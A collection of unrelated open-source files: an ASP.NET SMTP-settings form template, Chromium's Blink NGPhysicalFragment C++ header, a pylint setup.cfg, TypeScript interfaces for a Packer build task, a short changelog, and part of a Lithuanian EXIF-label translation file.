<input id="currentSenderDisplayName" type="hidden" value="<%= CurrentSmtpSettings.SenderDisplayName %>" />
<input id="currentSenderAddress" type="hidden" value="<%= CurrentSmtpSettings.SenderAddress %>" />
<input id="currentEnableSsl" type="hidden" value="<%= CurrentSmtpSettings.EnableSSL %>" />
<input id="currentEnableAuth" type="hidden" value="<%= CurrentSmtpSettings.EnableAuth %>" />
<input id="currentIsDefault" type="hidden" value="<%= CoreContext.Configuration.SmtpSettings.IsDefaultSettings %>" />
</div>
<div id="settingsSwitch" class="settings-block display-none">
<div id="settingsSwitchHeader"><%= Resource.Source %>:</div>
<div class="clearFix">
<input id="customSettingsRadio" type="radio" name="settingsRadio" value="0" checked="checked">
<label for="customSettingsRadio"><%= Resource.SmtpCustomSettings %></label>
</div>
<div class="clearFix">
<input id="mailserverSettingsRadio" type="radio" name="settingsRadio" value="1">
<label for="mailserverSettingsRadio"><%= Resource.SmtpMailServerSettings %></label>
</div>
</div>
<div id="customSettingsBox" class="smtp-settings-block clearFix"></div>
<script id="customSettingsBoxTmpl" type="text/x-jquery-tmpl">
<div class="smtp-settings-item">
<div class="host requiredField">
<span class="requiredErrorText"><%= Resource.LdapSettingsEmptyField %></span>
<div class="smtp-settings-title headerPanelSmall"><%= Resource.HostName %>:</div>
<input type="text" class="smtp-settings-field textEdit" value="${ host }" />
</div>
<div class="port requiredField">
<div class="smtp-settings-title headerPanelSmall"><%= Resource.Port %>:</div>
<input type="text" class="smtp-settings-field textEdit" value="${ port }" />
</div>
</div>
<div class="smtp-settings-item">
<input id="customSettingsAuthenticationRequired" type="checkbox" {{if enableAuth }} checked="checked" {{/if}} />
<label for="customSettingsAuthenticationRequired"><%= Resource.Authentication %></label>
</div>
<div class="smtp-settings-item host-login requiredField">
<span class="requiredErrorText"><%= Resource.LdapSettingsEmptyField %></span>
<div class="smtp-settings-title headerPanelSmall"><%= Resource.HostLogin %>:</div>
<input type="text" class="smtp-settings-field textEdit" value="${ credentialsUserName }"
{{if !enableAuth }} disabled="disabled" {{/if}}/>
</div>
<div class="smtp-settings-item host-password requiredField">
<span class="requiredErrorText"><%= Resource.LdapSettingsEmptyField %></span>
<div class="smtp-settings-title headerPanelSmall"><%= Resource.HostPassword %>:</div>
<input style="display:none" type="password" name="fakepasswordremembered"/>
<input autocomplete="off" type="password" class="smtp-settings-field textEdit" value="${ credentialsUserPassword }"
{{if !enableAuth }} disabled="disabled"{{else}} placeholder="**********"{{/if}} />
</div>
<div class="smtp-settings-item display-name">
<div class="smtp-settings-title"><%= Resource.SenderName %>:</div>
<input type="text" class="smtp-settings-field textEdit" value="${ senderDisplayName }" />
</div>
<div class="smtp-settings-item email-address requiredField">
<span class="requiredErrorText"><%= Resource.LdapSettingsEmptyField %></span>
<div class="smtp-settings-title headerPanelSmall"><%= Resource.SenderEmailAddress %>:</div>
<input type="text" class="smtp-settings-field textEdit" value="${ senderAddress }" />
</div>
<div class="smtp-settings-item clearFix enable-ssl">
<input id="customSettingsEnableSsl" type="checkbox" {{if enableSSL }} checked="checked" {{/if}} />
<label for="customSettingsEnableSsl"><%= Resource.EnableSSL %></label>
</div>
</script>
<div id="mailserverSettingsBox" class="smtp-settings-block clearFix"></div>
<script id="mailserverSettingsBoxTmpl" type="text/x-jquery-tmpl">
{{if domains.length}}
<div id="notificationBox">
<div class="smtp-settings-item display-name">
<div class="smtp-settings-title"><%= Resource.SenderName %>:</div>
<input type="text" id="notificationSenderDisplayName" class="smtp-settings-field textEdit" value="${senderDisplayName}">
</div>
<div class="smtp-settings-item email-address requiredField">
<span class="requiredErrorText"><%= Resource.LdapSettingsEmptyField %></span>
<div class="smtp-settings-title headerPanelSmall"><%= Resource.SenderEmailAddress %>:</div>
<input id="notificationLogin" type="text" class="textEdit" value="${login.replace(/@.*/, '')}">
<span id="notificationHostDomainSplitter">@</span>
<select id="notificationDomain" class="comboBox">
{{each domains}}
<option value="${id}" {{if name == $data.login.replace(/.*@/, '')}} selected="selected"{{/if}}>${name}</option>
{{/each}}
</select>
</div>
</div>
{{else}}
<p id="noDomainsMsg">
<%= string.Format(Resource.NoMailServerDomainsMsg.HtmlEncode(), "<a href=\"/addons/mail/#administration\" class=\"link\" target=\"_blank\">", "</a>") %>
</p>
{{/if}}
</script>
<div class="middle-button-container">
<button id="saveSettingsBtn" class="button blue"><%= Resource.SaveButton %></button>
<span class="splitter-buttons"></span>
<button id="saveDefaultCustomSettingsBtn" class="button gray<% if (CurrentSmtpSettings.IsDefaultSettings)
{ %> disable" disabled="disabled<% } %>"><%= Resource.DefaultSettings %></button>
<span class="splitter-buttons"></span>
<button id="sendTestMailBtn" class="button gray <% if (CurrentSmtpSettings.IsDefaultSettings)
{ %> disable" disabled="disabled<% } %>"><%= Resource.SendTestMail %></button>
</div>
</div>
<div class="settings-help-block">
<%= String.Format(Resource.SMTPSettingsHelp.HtmlEncode(), "<br />") %>
</div>
</div>
|
{
"pile_set_name": "Github"
}
|
// Copyright 2016 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef THIRD_PARTY_BLINK_RENDERER_CORE_LAYOUT_NG_NG_PHYSICAL_FRAGMENT_H_
#define THIRD_PARTY_BLINK_RENDERER_CORE_LAYOUT_NG_NG_PHYSICAL_FRAGMENT_H_
#include "base/memory/scoped_refptr.h"
#include "third_party/blink/renderer/core/core_export.h"
#include "third_party/blink/renderer/core/editing/forward.h"
#include "third_party/blink/renderer/core/layout/geometry/physical_offset.h"
#include "third_party/blink/renderer/core/layout/geometry/physical_rect.h"
#include "third_party/blink/renderer/core/layout/geometry/physical_size.h"
#include "third_party/blink/renderer/core/layout/layout_object.h"
#include "third_party/blink/renderer/core/layout/ng/ng_style_variant.h"
#include "third_party/blink/renderer/platform/graphics/touch_action.h"
#include "third_party/blink/renderer/platform/wtf/ref_counted.h"
#include <unicode/ubidi.h>
namespace blink {
class ComputedStyle;
class Node;
class NGFragmentBuilder;
class NGInlineItem;
class PaintLayer;
class NGPhysicalFragment;
struct CORE_EXPORT NGPhysicalFragmentTraits {
static void Destruct(const NGPhysicalFragment*);
};
// The NGPhysicalFragment contains the output geometry from layout. The
// fragment stores all of its information in the physical coordinate system for
// use by paint, hit-testing etc.
//
// The fragment keeps a pointer back to the LayoutObject which generated it.
// Once we have transitioned fully to LayoutNG it should be a const pointer
// such that paint/hit-testing/etc don't modify it.
//
// Layout code should only access geometry information through the
// NGFragment wrapper classes which transforms information into the logical
// coordinate system.
class CORE_EXPORT NGPhysicalFragment
: public RefCounted<const NGPhysicalFragment, NGPhysicalFragmentTraits> {
public:
enum NGFragmentType {
kFragmentBox = 0,
kFragmentText = 1,
kFragmentLineBox = 2,
kFragmentRenderedLegend = 3,
// When adding new values, make sure the bit size of |type_| is large
// enough to store.
};
enum NGBoxType {
kNormalBox,
kInlineBox,
// A multi-column container creates column boxes as its children, which
// content is flowed into. https://www.w3.org/TR/css-multicol-1/#column-box
kColumnBox,
kAtomicInline,
kFloating,
kOutOfFlowPositioned,
kBlockFlowRoot,
// When adding new values, make sure the bit size of |sub_type_| is large
// enough to store.
// Also, add after kMinimumBlockFormattingContextRoot if the box type is a
// block formatting context root, or before otherwise. See
// IsBlockFormattingContextRoot().
kMinimumBlockFormattingContextRoot = kAtomicInline
};
~NGPhysicalFragment();
NGFragmentType Type() const { return static_cast<NGFragmentType>(type_); }
bool IsContainer() const {
return Type() == NGFragmentType::kFragmentBox ||
Type() == NGFragmentType::kFragmentLineBox ||
Type() == NGFragmentType::kFragmentRenderedLegend;
}
bool IsBox() const { return Type() == NGFragmentType::kFragmentBox; }
bool IsText() const { return Type() == NGFragmentType::kFragmentText; }
bool IsLineBox() const { return Type() == NGFragmentType::kFragmentLineBox; }
// Return true if this is the legend child of a fieldset that gets special
// treatment (i.e. placed over the block-start border).
bool IsRenderedLegend() const {
return Type() == NGFragmentType::kFragmentRenderedLegend;
}
// Returns the box type of this fragment.
NGBoxType BoxType() const {
DCHECK(IsBox());
return static_cast<NGBoxType>(sub_type_);
}
// True if this is an inline box; e.g., <span>. Atomic inlines such as
// replaced elements or inline block are not included.
bool IsInlineBox() const {
return IsBox() && BoxType() == NGBoxType::kInlineBox;
}
bool IsColumnBox() const {
return IsBox() && BoxType() == NGBoxType::kColumnBox;
}
// An atomic inline is represented as a kFragmentBox, such as inline block and
// replaced elements.
bool IsAtomicInline() const {
return IsBox() && BoxType() == NGBoxType::kAtomicInline;
}
// True if this fragment is in-flow in an inline formatting context.
bool IsInline() const {
return IsText() || IsInlineBox() || IsAtomicInline();
}
bool IsFloating() const {
return IsBox() && BoxType() == NGBoxType::kFloating;
}
bool IsOutOfFlowPositioned() const {
return IsBox() && BoxType() == NGBoxType::kOutOfFlowPositioned;
}
bool IsFloatingOrOutOfFlowPositioned() const {
return IsFloating() || IsOutOfFlowPositioned();
}
// Return true if this fragment corresponds directly to an entry in the CSS
// box tree [1]. Note that anonymous blocks also exist in the CSS box
// tree. Returns false otherwise, i.e. if the fragment is generated by the
// layout engine to contain fragments from CSS boxes (a line or a generated
// fragmentainer [2], in other words). The main signification of this is
// whether we can use the LayoutObject associated with this fragment for all
// purposes.
//
// [1] https://www.w3.org/TR/css-display-3/#box-tree
// [2] https://www.w3.org/TR/css-break-3/#fragmentation-container
bool IsCSSBox() const { return !IsLineBox() && !IsColumnBox(); }
bool IsBlockFlow() const;
bool IsAnonymousBlock() const {
return IsCSSBox() && layout_object_->IsAnonymousBlock();
}
bool IsListMarker() const {
return IsCSSBox() && layout_object_->IsLayoutNGListMarker();
}
// Return true if this fragment is a container established by a fieldset
// element. Such a fragment contains an optional rendered legend fragment and
// an optional fieldset contents wrapper fragment (which holds everything
// inside the fieldset except the rendered legend).
bool IsFieldsetContainer() const { return is_fieldset_container_; }
// Returns whether the fragment is legacy layout root.
bool IsLegacyLayoutRoot() const { return is_legacy_layout_root_; }
bool IsBlockFormattingContextRoot() const {
return (IsBox() &&
BoxType() >= NGBoxType::kMinimumBlockFormattingContextRoot) ||
IsLegacyLayoutRoot();
}
// |Offset()| is reliable only when this fragment was placed by LayoutNG
// parent. When the parent is not LayoutNG, the parent may move the
// |LayoutObject| after this fragment was placed. See comments in
// |LayoutNGBlockFlow::UpdateBlockLayout()| and crbug.com/788590
bool IsPlacedByLayoutNG() const;
// The accessors in this class shouldn't be used by layout code directly,
// instead should be accessed by the NGFragmentBase classes. These accessors
// exist for paint, hit-testing, etc.
// Returns the border-box size.
PhysicalSize Size() const { return size_; }
// Returns the rect in the local coordinate of this fragment; i.e., offset is
// (0, 0).
PhysicalRect LocalRect() const { return {{}, size_}; }
NGStyleVariant StyleVariant() const {
return static_cast<NGStyleVariant>(style_variant_);
}
bool UsesFirstLineStyle() const {
return StyleVariant() == NGStyleVariant::kFirstLine;
}
// Returns the style for this fragment.
//
// For a line box, this returns the style of the containing block. This mostly
// represents the style for the line box, except 1) |style.Direction()| maybe
// incorrect, use |BaseDirection()| instead, and 2) margin/border/padding,
// background etc. do not apply to the line box.
const ComputedStyle& Style() const {
return layout_object_->EffectiveStyle(StyleVariant());
}
const Document& GetDocument() const {
DCHECK(layout_object_);
return layout_object_->GetDocument();
}
Node* GetNode() const {
return IsCSSBox() ? layout_object_->GetNode() : nullptr;
}
Node* GeneratingNode() const {
return IsCSSBox() ? layout_object_->GeneratingNode() : nullptr;
}
// The node to return when hit-testing on this fragment. This can be different
// from GetNode() when this fragment is content of a pseudo node.
Node* NodeForHitTest() const { return layout_object_->NodeForHitTest(); }
// Whether there is a PaintLayer associated with the fragment.
bool HasLayer() const { return IsCSSBox() && layout_object_->HasLayer(); }
// The PaintLayer associated with the fragment.
PaintLayer* Layer() const;
// Whether this object has a self-painting |Layer()|.
bool HasSelfPaintingLayer() const;
// True if overflow != 'visible', except for certain boxes that do not allow
// overflow clip; i.e., AllowOverflowClip() returns false.
bool HasOverflowClip() const {
return IsCSSBox() && layout_object_->HasOverflowClip();
}
bool ShouldClipOverflow() const {
return IsCSSBox() && layout_object_->ShouldClipOverflow();
}
// This fragment is hidden for paint purpose, but exists for querying layout
// information. Used for `text-overflow: ellipsis`.
bool IsHiddenForPaint() const { return is_hidden_for_paint_; }
// GetLayoutObject should only be used when necessary for compatibility
// with LegacyLayout.
//
// For a line box, |layout_object_| has its containing block but this function
// returns |nullptr| for the historical reasons. TODO(kojii): We may change
// this in future. Use |IsLineBox()| instead of testing this is |nullptr|.
const LayoutObject* GetLayoutObject() const {
return IsCSSBox() ? layout_object_ : nullptr;
}
// TODO(kojii): We should not have mutable version at all, the use of this
// function should be eliminiated over time.
LayoutObject* GetMutableLayoutObject() const {
return IsCSSBox() ? layout_object_ : nullptr;
}
// |NGPhysicalFragment| may live longer than the corresponding |LayoutObject|.
// Though |NGPhysicalFragment| is immutable, |layout_object_| is cleared to
// |nullptr| when it was destroyed to avoid reading destroyed objects.
bool IsAlive() const { return layout_object_; }
void LayoutObjectWillBeDestroyed() const {
const_cast<NGPhysicalFragment*>(this)->layout_object_ = nullptr;
}
// Returns the latest generation of the post-layout fragment. Returns
// |nullptr| if |this| is the one.
//
// When subtree relayout occurs at the relayout boundary, its containing block
// may keep the reference to old generations of this fragment. Callers can
// check if there were newer generations.
const NGPhysicalFragment* PostLayout() const;
// Scrollable overflow. including contents, in the local coordinate.
PhysicalRect ScrollableOverflow() const;
// ScrollableOverflow(), with transforms applied wrt container if needed.
// This does not include any offsets from the parent (including relpos).
PhysicalRect ScrollableOverflowForPropagation(
const LayoutObject* container) const;
// The allowed touch action is the union of the effective touch action
// (from style) and blocking touch event handlers.
TouchAction EffectiveAllowedTouchAction() const;
// Returns the bidi level of a text or atomic inline fragment.
UBiDiLevel BidiLevel() const;
// Returns the resolved direction of a text or atomic inline fragment. Not to
// be confused with the CSS 'direction' property.
TextDirection ResolvedDirection() const;
// Utility functions for caret painting. Note that carets are painted as part
// of the containing block's foreground.
bool ShouldPaintCursorCaret() const;
bool ShouldPaintDragCaret() const;
bool ShouldPaintCarets() const {
return ShouldPaintCursorCaret() || ShouldPaintDragCaret();
}
String ToString() const;
void CheckType() const;
void CheckCanUpdateInkOverflow() const;
enum DumpFlag {
DumpHeaderText = 0x1,
DumpSubtree = 0x2,
DumpIndentation = 0x4,
DumpType = 0x8,
DumpOffset = 0x10,
DumpSize = 0x20,
DumpTextOffsets = 0x40,
DumpSelfPainting = 0x80,
DumpNodeName = 0x100,
DumpAll = -1
};
typedef int DumpFlags;
String DumpFragmentTree(DumpFlags,
base::Optional<PhysicalOffset> = base::nullopt,
unsigned indent = 2) const;
#if DCHECK_IS_ON()
void ShowFragmentTree() const;
#endif
protected:
NGPhysicalFragment(NGFragmentBuilder*,
NGFragmentType type,
unsigned sub_type);
NGPhysicalFragment(LayoutObject* layout_object,
NGStyleVariant,
PhysicalSize size,
NGFragmentType type,
unsigned sub_type);
const ComputedStyle& SlowEffectiveStyle() const;
const Vector<NGInlineItem>& InlineItemsOfContainingBlock() const;
LayoutObject* layout_object_;
const PhysicalSize size_;
const unsigned type_ : 2; // NGFragmentType
const unsigned sub_type_ : 3; // NGBoxType, NGTextType, or NGLineBoxType
const unsigned style_variant_ : 2; // NGStyleVariant
const unsigned is_hidden_for_paint_ : 1;
// The following bitfields are only to be used by NGPhysicalContainerFragment
// (it's defined here to save memory, since that class has no bitfields).
unsigned has_floating_descendants_for_paint_ : 1;
unsigned has_adjoining_object_descendants_ : 1;
unsigned has_orthogonal_flow_roots_ : 1;
unsigned may_have_descendant_above_block_start_ : 1;
unsigned depends_on_percentage_block_size_ : 1;
// The following bitfields are only to be used by NGPhysicalLineBoxFragment
// (it's defined here to save memory, since that class has no bitfields).
unsigned has_propagated_descendants_ : 1;
unsigned base_direction_ : 1; // TextDirection
unsigned has_hanging_ : 1;
// The following bitfields are only to be used by NGPhysicalBoxFragment
// (it's defined here to save memory, since that class has no bitfields).
unsigned children_inline_ : 1;
unsigned has_fragment_items_ : 1;
unsigned border_edge_ : 4; // NGBorderEdges::Physical
unsigned has_borders_ : 1;
unsigned has_padding_ : 1;
unsigned is_first_for_node_ : 1;
// The following are only used by NGPhysicalBoxFragment but are initialized
// for all types to allow methods using them to be inlined.
unsigned is_fieldset_container_ : 1;
unsigned is_legacy_layout_root_ : 1;
// The following bitfields are only to be used by NGPhysicalTextFragment
// (it's defined here to save memory, since that class has no bitfields).
unsigned is_generated_text_ : 1;
mutable unsigned ink_overflow_computed_ : 1;
private:
friend struct NGPhysicalFragmentTraits;
void Destroy() const;
};
// Used for return value of traversing fragment tree.
struct CORE_EXPORT NGPhysicalFragmentWithOffset {
DISALLOW_NEW();
scoped_refptr<const NGPhysicalFragment> fragment;
PhysicalOffset offset_to_container_box;
PhysicalRect RectInContainerBox() const;
};
CORE_EXPORT std::ostream& operator<<(std::ostream&, const NGPhysicalFragment*);
CORE_EXPORT std::ostream& operator<<(std::ostream&, const NGPhysicalFragment&);
#if !DCHECK_IS_ON()
inline void NGPhysicalFragment::CheckType() const {}
inline void NGPhysicalFragment::CheckCanUpdateInkOverflow() const {}
#endif
} // namespace blink
#endif // THIRD_PARTY_BLINK_RENDERER_CORE_LAYOUT_NG_NG_PHYSICAL_FRAGMENT_H_
|
{
"pile_set_name": "Github"
}
|
[bdist_rpm]
packager = Sylvain Thenault <sylvain.thenault@logilab.fr>
provides = pylint
|
{
"pile_set_name": "Github"
}
|
import * as tr from "azure-pipelines-task-lib/toolrunner";
import TaskParameters from "./taskParameters"
export enum TemplateFileProviderTypes {
BuiltIn = 0,
Custom = 1
}
export enum VariablesProviderTypes {
AzureSPN = 0,
TaskInput = 1
}
export interface IOutputParser {
parse(line: string): void;
getExtractedOutputs(): any;
}
export interface IPackerHost {
createPackerTool(): tr.ToolRunner;
execTool(command: tr.ToolRunner, outputParser?: IOutputParser): Q.Promise<any>;
getTemplateFileProvider(): ITemplateFileProvider;
getTemplateVariablesProviders(): ITemplateVariablesProvider[];
registerTemplateFileProvider(providerType: TemplateFileProviderTypes, provider: ITemplateFileProvider);
registerTemplateVariablesProvider(providerType: VariablesProviderTypes, provider: ITemplateVariablesProvider);
getTaskParameters(): TaskParameters;
getStagingDirectory(): string;
}
export interface ITemplateFileProvider {
register(packerHost: IPackerHost): void;
getTemplateFileLocation(packerHost: IPackerHost): string;
saveUpdatedTemplateFile(content: string, newNameSuffix: string): void;
cleanup(): void;
}
export interface ITemplateVariablesProvider {
register(packerHost: IPackerHost): void;
getTemplateVariables(packerHost: IPackerHost): Promise<Map<string, string>>;
}
|
{
"pile_set_name": "Github"
}
|
- Review WaveView
- Minor UI changes
- Fixes to artist details layout
|
{
"pile_set_name": "Github"
}
|
{
"@metadata": {
"authors": [
"Eitvys200",
"Garas",
"Homo",
"Hugo.arg",
"Ignas693",
"Matasg",
"Perkunas",
"Tomasdd",
"Vpovilaitis",
"Zygimantus"
]
},
"exif-imagewidth": "Plotis",
"exif-imagelength": "Aukštis",
"exif-bitspersample": "Bitai komponente",
"exif-compression": "Suspaudimo tipas",
"exif-photometricinterpretation": "Taškų struktūra",
"exif-orientation": "Pasukimas",
"exif-samplesperpixel": "Komponentų skaičius",
"exif-planarconfiguration": "Duomenų išdėstymas",
"exif-ycbcrsubsampling": "Y iki C atrankos santykis",
"exif-ycbcrpositioning": "Y ir C pozicija",
"exif-xresolution": "Horizontali raiška",
"exif-yresolution": "Vertikali raiška",
"exif-stripoffsets": "Paveikslėlio duomenų vieta",
"exif-rowsperstrip": "Eilių skaičius juostoje",
"exif-stripbytecounts": "Baitai suspaustje juostoje",
"exif-jpeginterchangeformat": "JPEG SOI pozicija",
"exif-jpeginterchangeformatlength": "JPEG duomenų baitai",
"exif-whitepoint": "Balto taško chromatiškumas",
"exif-primarychromaticities": "Pagrindinių spalvų chromiškumas",
"exif-ycbcrcoefficients": "Spalvų pristatym matricos matricos koeficientai",
"exif-referenceblackwhite": "Juodos ir baltos poros nuorodos reikšmės",
"exif-datetime": "Rinkmenos keitimo data ir laikas",
"exif-imagedescription": "Paveikslėlio pavadinimas",
"exif-make": "Kameros gamintojas",
"exif-model": "Kameros modelis",
"exif-software": "Naudota programinė įranga",
"exif-artist": "Autorius",
"exif-copyright": "Autorystės teisių savininkas",
"exif-exifversion": "Exif versija",
"exif-flashpixversion": "Palaikoma Flashpix versija",
"exif-colorspace": "Spalvų pristatymas",
"exif-componentsconfiguration": "kiekvieno komponento reikšmė",
"exif-compressedbitsperpixel": "Paveikslėlio suspaudimo režimas",
"exif-pixelxdimension": "Paveikslėlio plotis",
"exif-pixelydimension": "Vaizdo aukštis",
"exif-usercomment": "Naudotojo komentarai",
"exif-relatedsoundfile": "Susijusi garso byla",
"exif-datetimeoriginal": "Duomenų generavimo data ir laikas",
"exif-datetimedigitized": "Datos ir laiko pervedimas į skaitmeninį formatą",
"exif-subsectime": "Datos ir laiko sekundės dalys",
"exif-subsectimeoriginal": "Duomenų generavimo datos ir laiko sekundės dalys",
"exif-subsectimedigitized": "Pervedimo į skaitmeninį formatą datos ir laiko sekundės dalys",
"exif-exposuretime": "Išlaikymo laikas",
"exif-exposuretime-format": "$1 sek. ($2)",
"exif-fnumber": "F numeris",
"exif-exposureprogram": "Išlaikymo programa",
"exif-spectralsensitivity": "Spektrinis jautrumas",
"exif-isospeedratings": "ISO greitis",
"exif-shutterspeedvalue": "APEX užrakto greičio",
"exif-aperturevalue": "APEX diafragma",
"exif-brightnessvalue": "APEX ryškumas",
"exif-exposurebiasvalue": "Išlaikymo paklaida",
"exif-maxaperturevalue": "Mažiausias lešio F numeris",
"exif-subjectdistance": "Objekto atstumas",
"exif-meteringmode": "Matavimo režimas",
"exif-lightsource": "Šviesos šaltinis",
"exif-flash": "Blykstė",
"exif-focallength": "Židinio nuotolis",
"exif-subjectarea": "Objekto zona",
"exif-flashenergy": "Blykstės energija",
"exif-focalplanexresolution": "Židinio projekcijos X raiška",
"exif-focalplaneyresolution": "Židinio projekcijos Y raiška",
"exif-focalplaneresolutionunit": "Židinio projekcijos raiškos matavimo vienetai",
"exif-subjectlocation": "Objekto vieta",
"exif-exposureindex": "Išlaikymo indeksas",
"exif-sensingmethod": "Jutimo režimas",
"exif-filesource": "Failo šaltinis",
"exif-scenetype": "Scenos tipas",
"exif-customrendered": "Pasirinktinis vaizdo apdorojimas",
"exif-exposuremode": "Išlaikymo režimas",
"exif-whitebalance": "Baltumo balansas",
"exif-digitalzoomratio": "Skaitmeninio priartinimo koeficientas",
"exif-focallengthin35mmfilm": "Židinio nuotolis 35 mm juostoje",
"exif-scenecapturetype": "Scenos fiksavimo tipas",
"exif-gaincontrol": "Scenos kontrolė",
"exif-contrast": "Kontrastas",
"exif-saturation": "Sodrumas",
"exif-sharpness": "Aštrumas",
"exif-devicesettingdescription": "Įrenginio nustatymų aprašas",
"exif-subjectdistancerange": "Objekto nuotolis",
"exif-imageuniqueid": "Unikalusis paveikslėlio ID",
"exif-gpsversionid": "GPS versija",
"exif-gpslatituderef": "Šiaurės ar pietų platuma",
"exif-gpslatitude": "Platuma",
"exif-gpslongituderef": "Rytų ar vakarų ilguma",
"exif-gpslongitude": "Ilguma",
"exif-gpsaltituderef": "Aukščio nuoroda",
"exif-gpsaltitude": "Aukštis",
"exif-gpstimestamp": "GPS laikas (atominis laikrodis)",
"exif-gpssatellites": "Palydovai, naudoti matavimui",
"exif-gpsstatus": "Gaviklio būsena",
"exif-gpsmeasuremode": "Matavimo režimas",
"exif-gpsdop": "Matavimo tikslumas",
"exif-gpsspeedref": "Greičio vienetai",
"exif-gpsspeed": "GPS gaviklio greitis",
"exif-gpstrackref": "Nuoroda judėjimo krypčiai",
"exif-gpstrack": "Judėjimo kryptis",
"exif-gpsimgdirectionref": "Nuoroda vaizdo krypčiai",
"exif-gpsimgdirection": "Nuotraukos kryptis",
"exif-gpsmapdatum": "Panaudoti geodeziniai apžvalgos duomenys",
"exif-gpsdestlatituderef": "Nuoroda paskirties platumai",
"exif-gpsdestlatitude": "Paskirties platuma",
"exif-gpsdestlongituderef": "Nuoroda paskirties ilgumai",
"exif-gpsdestlongitude": "Paskirties ilguma",
"exif-gpsdestbearingref": "Nuoroda į paskirties pelengą",
"exif-gpsdestbearing": "Paskirties pelengas",
"exif-gpsdestdistanceref": "Nuoroda atstumui iki paskirties",
"exif-gpsdestdistance": "Atstumas iki paskirties",
"exif-gpsprocessingmethod": "GPS apdorojimo metodo pavadinimas",
"exif-gpsareainformation": "GPS zonos pavadinimas",
"exif-gpsdatestamp": "GPS data",
"exif-gpsdifferential": "GPS diferiancialo pataisymas",
"exif-jpegfilecomment": "JPEG failas komentarą",
"exif-keywords": "Raktiniai žodžiai",
"exif-worldregioncreated": "Pasaulio regione, kad nuotrauka buvo imtasi",
"exif-countrycreated": "Šalis, kad nuotrauka buvo imtasi",
"exif-countrycodecreated": "Kodas šaliai, kad nuotrauka buvo imtasi",
"exif-provinceorstatecreated": "Provincijos ar nurodyti, kad nuotrauka buvo imtasi",
"exif-citycreated": "Miestas, kad nuotrauka buvo imtasi",
"exif-sublocationcreated": "Sublocation miesto, kad nuotrauka buvo imtasi",
"exif-worldregiondest": "Pasaulio regionas rodomas",
"exif-countrydest": "Šalis rodomas",
"exif-countrycodedest": "Kodas šalies rodomas",
"exif-provinceorstatedest": "Rodoma provincija arba valstija",
"exif-citydest": "Rodomas miestas",
"exif-sublocationdest": "Miesto vietovė rodoma",
"exif-objectname": "Trumpas pavadinimas",
"exif-specialinstructions": "Specialiosios instrukcijos",
"exif-headline": "Antraštė",
"exif-credit": "Padėka/tiekėjas",
"exif-source": "Šaltinis",
"exif-editstatus": "Paveikslėlio redagavimo būsena",
"exif-urgency": "Skuba",
"exif-fixtureidentifier": "Pastovių duomenų pavadinimas",
"exif-locationdest": "Rodoma vietovė",
"exif-locationdestcode": "Rodomos vietovės kodas",
"exif-objectcycle": "Dienos laikas, kuriam skiriamas turinys",
"exif-contact": "Kontaktinė informacija",
"exif-writer": "Rašytojas",
"exif-languagecode": "Kalba",
"exif-iimversion": "IIM versija",
"exif-iimcategory": "Kategorija",
"exif-iimsupplementalcategory": "Papildomos kategorijos",
"exif-datetimeexpires": "Nenaudokite po",
"exif-datetimereleased": "Išleista",
"exif-originaltransmissionref": "Pradinis perdavimo vietos kodas",
"exif-identifier": "Identifikatorius",
"exif-lens": "Naudotas objektyvas",
"exif-serialnumber": "kameros serijinis numeris",
"exif-cameraownername": "Fotoaparato savininkas",
"exif-label": "Etiketė",
"exif-datetimemetadata": "Paskutinį kartą metadata duomenys keisti",
"exif-nickname": "Neoficialus paveikslėlio pavadinimas",
"exif-rating": "Vertinimas (iki 5)",
"exif-rightscertificate": "Teisių valdymo sertifikatas",
"exif-copyrighted": "Autorių teisių statusas",
"exif-copyrightowner": "Autorystės teisių savininkas",
"exif-usageterms": "Naudojimo sąlygos",
"exif-webstatement": "Autorių teisių pareiškimas internete",
"exif-originaldocumentid": "Unikalus ID orginalus dokumentas",
"exif-licenseurl": "Autorių teisių licencijos URL",
"exif-morepermissionsurl": "Alternatyvi licencijavimo informacija",
"exif-attributionurl": "Kai pakartotinai naudojate ši darbą, prašome nurodyti į",
"exif-preferredattributionname": "Kai naudojate ši darbą prašome nurodyti",
"exif-pngfilecomment": "Pastabos dėl PNG rinkmenos",
"exif-disclaimer": "Atsakomybės apribojimas",
"exif-contentwarning": "Turinio įspėjimas",
"exif-giffilecomment": "GIF rinkmenos paaiškinimas",
"exif-intellectualgenre": "Elemento tipas",
"exif-subjectnewscode": "Objektas kodas",
"exif-scenecode": "IPTC scenos kodas",
"exif-event": "Vaizduojamas įvykis",
"exif-organisationinimage": "Vaizduojama organizacija",
"exif-personinimage": "Vaizduojamas asmuo",
"exif-originalimageheight": "Piešinio aukštis prieš apkarpymą",
"exif-originalimagewidth": "Piešinio plotis prieš apkarpymą",
"exif-compression-1": "Nesuspausta",
"exif-compression-2": "CCITT grupės 3 1-Dimensijos Modifikuotas Hafmano duomenų paleidimo ilgio kodavimas.",
"exif-compression-3": "CCITT 3 grupės fakso kodavimas",
"exif-compression-4": "CCITT 4 grupės fakso kodavimas",
"exif-copyrighted-true": "Autorinės teisės",
"exif-copyrighted-false": "Autorinių teisių padėtis nenustatyta",
"exif-photometricinterpretation-1": "Juoda ir balta (Juoda yra 0)",
"exif-unknowndate": "Nežinoma data",
"exif-orientation-1": "Standartinis",
"exif-orientation-2": "Apversta horizontaliai",
"exif-orientation-3": "Pasukta 180°",
"exif-orientation-4": "Apversta vertikaliai",
"exif-orientation-5": "Pasukta 90° prieš laikrodžio rodyklę ir apversta vertikaliai",
"exif-orientation-6": "Pasukta 90° laikrodžio rodyklės kryptimi",
"exif-orientation-7": "Pasukta 90° laikrodžio rodyklės kryptimi ir apversta vertikaliai",
"exif-orientation-8": "Pasukta 90° prieš laikrodžio rodyklę",
"exif-planarconfiguration-1": "stambusis formatas",
"exif-planarconfiguration-2": "plokštuminis formatas",
"exif-xyresolution-i": "$1 taškai colyje",
"exif-xyresolution-c": "$1 taškai centimetre",
"exif-colorspace-65535": "Spalvos nekalibruotos",
"exif-componentsconfiguration-0": "neegzistuoja",
"exif-exposureprogram-0": "Nenurodyta",
"exif-exposureprogram-1": "Rankinė",
"exif-exposureprogram-2": "Paprasta programa",
"exif-exposureprogram-3": "Diafragmos pirmenybė",
"exif-exposureprogram-4": "Užrakto pirmenybė",
"exif-exposureprogram-5": "Kūrybos programa (linkusi į lauko gylį)",
"exif-exposureprogram-6": "Veiksmo programa (linkusi link greito užrakto greičio)",
"exif-exposureprogram-7": "Portreto režimas (nuotraukoms iš arti nepabrėžiant fono)",
"exif-exposureprogram-8": "Peizažo režimas (peizažo nuotraukoms pabrėžiant foną)",
